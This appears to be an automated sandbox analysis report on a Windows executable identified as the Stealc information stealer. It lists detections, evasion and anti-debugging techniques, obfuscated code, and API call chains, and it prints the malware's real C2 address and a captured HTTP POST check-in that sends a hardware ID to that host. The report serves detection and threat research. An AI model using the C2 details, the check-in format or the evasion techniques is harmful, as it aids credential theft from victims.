
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1523176
MD5: 564e5677e7262707df20c3ea7f110513
SHA1: be8c6288b0baf0bd470e6ab8174e85c03470e0f5
SHA256: 8ed1f28fe0588fd7e27b22329ba5c2cbed9bf6aeec4e2e4dbe2cf751f2f1d629
Tags: exe user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1520 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 564E5677E7262707DF20C3EA7F110513)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2024949095.0000000004E60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 1520 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 1520 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.130000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-01T08:19:58.612159+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.130000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/E | Virustotal: Detection: 16%
Source: http://185.215.113.37/ws | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpy | Virustotal: Detection: 16%
Source: http://185.215.113.37/2 | Virustotal: Detection: 16%
Source: file.exe | Virustotal: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_0013C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00137240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00137240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00139AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00139AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00139B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00139B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00148EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00148EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_001438B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00144910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00144910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0013DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0013E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0013ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00144570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00144570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0013DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0013BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013F68A FindFirstFileA | 0_2_0013F68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0013F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00143EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00143EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001316D0

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCB | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 41 31 35 35 39 32 32 44 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a | Data Ascii: ------AAKKKEBFCGDBGDGCFHCB | Content-Disposition: form-data; name="hwid" | 31A155922DF51660493485 | ------AAKKKEBFCGDBGDGCFHCB | Content-Disposition: form-data; name="build" | doma | ------AAKKKEBFCGDBGDGCFHCB--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (7 identical entries)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00134880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00134880
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (same request headers and multipart body as the global traffic POST entry above)
Source: file.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/2
Source: file.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/E
Source: file.exe, 00000000.00000002.2066181737.0000000001089000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
Source: file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E | 0_2_0050502E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FA96E | 0_2_004FA96E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0059897F | 0_2_0059897F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00508179 | 0_2_00508179
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004DE998 | 0_2_004DE998
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0059EA28 | 0_2_0059EA28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DAAB9 | 0_2_003DAAB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00503A91 | 0_2_00503A91
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050BBCB | 0_2_0050BBCB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052DBE3 | 0_2_0052DBE3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FFC28 | 0_2_004FFC28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00509CB0 | 0_2_00509CB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FC530 | 0_2_004FC530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00471D9F | 0_2_00471D9F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004135AA | 0_2_004135AA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F8E2A | 0_2_004F8E2A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050EE3E | 0_2_0050EE3E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005016EC | 0_2_005016EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FE6A1 | 0_2_004FE6A1
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 001345C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: xlnfjtas ZLIB complexity 0.994943263011432
Source: file.exe, 00000000.00000003.2024949095.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00149600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00149600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00143720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00143720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\GMD8PWSD.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 42%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1858048 > 1048576
Source: file.exe | Static PE information: Raw size of xlnfjtas is bigger than: 0x100000 < 0x19f800

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.130000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xlnfjtas:EW;vyivhryn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xlnfjtas:EW;vyivhryn:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00149860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00149860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d245e should be: 0x1d1922
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: xlnfjtas
Source: file.exe | Static PE information: section name: vyivhryn
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0043D84A push 7795C047h; mov dword ptr [esp], eax | 0_2_0043D8D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0043D84A push 1EDDFD7Dh; mov dword ptr [esp], edx | 0_2_0043D946
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052A840 push 7727F62Ah; mov dword ptr [esp], eax | 0_2_0052A8F8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014B035 push ecx; ret | 0_2_0014B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00565873 push 5E08C7F6h; mov dword ptr [esp], ecx | 0_2_00565892
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00565873 push esi; mov dword ptr [esp], 3B8B728Fh | 0_2_005658AB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00565873 push 06DFA860h; mov dword ptr [esp], ecx | 0_2_005658C1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051501C push 5E736F00h; mov dword ptr [esp], ecx | 0_2_005152F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051501C push eax; mov dword ptr [esp], 71142E46h | 0_2_005153B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051501C push 2F3BD2ECh; mov dword ptr [esp], esp | 0_2_005153BD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00612830 push ebp; mov dword ptr [esp], 63442BE3h | 0_2_00612844
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0059A007 push ebp; mov dword ptr [esp], eax | 0_2_0059A046
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00528023 push ecx; ret | 0_2_00528032
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push 3F46C75Bh; mov dword ptr [esp], ecx | 0_2_00505094
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push edx; mov dword ptr [esp], esi | 0_2_005050AA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push eax; mov dword ptr [esp], 34E66A17h | 0_2_005050AE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push 6ACE5AC1h; mov dword ptr [esp], edi | 0_2_0050510E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push 1AE8FEADh; mov dword ptr [esp], ebx | 0_2_0050520A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push 47A536D2h; mov dword ptr [esp], edx | 0_2_00505252
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push 60FBF841h; mov dword ptr [esp], eax | 0_2_00505284
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push 50A5D974h; mov dword ptr [esp], eax | 0_2_005052C1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push eax; mov dword ptr [esp], 64E5AAC7h | 0_2_0050536F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push 1E33956Bh; mov dword ptr [esp], ebp | 0_2_005053BD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push 29B6DF8Fh; mov dword ptr [esp], ebp | 0_2_005053D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push ebp; mov dword ptr [esp], 269D697Fh | 0_2_005053D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push edx; mov dword ptr [esp], 20A8104Eh | 0_2_005053FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push ebp; mov dword ptr [esp], 7BF381B2h | 0_2_00505409
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push ecx; mov dword ptr [esp], ebx | 0_2_00505469
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push ecx; mov dword ptr [esp], ebp | 0_2_00505478
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push 311C4054h; mov dword ptr [esp], edx | 0_2_005054C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050502E push 2743A6D9h; mov dword ptr [esp], ecx | 0_2_005054FB
Source: file.exe | Static PE information: section name: xlnfjtas entropy: 7.954276086869488

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00149860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00149860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13608
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 513034 second address: 51303E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5B4D24B716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 502CD7 second address: 502CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5B4C774D8Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 513564 second address: 513568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5136B6 second address: 5136C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5B4C774D86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5136C0 second address: 5136CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5136CA second address: 5136DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5136DC second address: 5136E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F5B4D24B716h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5136E7 second address: 5136EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5136EF second address: 513714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5B4D24B727h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 513714 second address: 513739 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D97h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F5B4C774D92h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 513739 second address: 513754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5B4D24B716h 0x0000000a jc 00007F5B4D24B71Eh 0x00000010 push edx 0x00000011 pop edx 0x00000012 jne 00007F5B4D24B716h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 516A3E second address: 516A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 516A42 second address: 516A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 516BB6 second address: 516BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 516BBC second address: 516BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 516BC0 second address: 516C13 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, dword ptr [ebp+122D2A2Bh] 0x00000015 jmp 00007F5B4C774D8Eh 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F5B4C774D88h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 mov edi, 37FB520Bh 0x0000003b push 95115414h 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 push edi 0x00000044 pop edi 0x00000045 rdtsc
